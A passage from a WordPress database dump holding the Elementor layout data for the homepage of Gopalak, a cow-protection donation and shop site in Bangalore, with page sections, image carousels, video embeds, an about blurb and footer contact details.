height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11896,1972,'_elementor_page_assets','a:0:{}'),(11899,1973,'_elementor_edit_mode','builder'),(11900,1973,'_elementor_template_type','wp-page'),(11901,1973,'_elementor_version','3.7.8'),(11902,1973,'_wp_page_template','elementor_canvas'),(11903,1973,'_elementor_data','[{\"id\":\"442ae7f\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"27b1818\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"b4f0fda\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"69a6cbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"79e4ef4\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2424986\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8aaabba\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\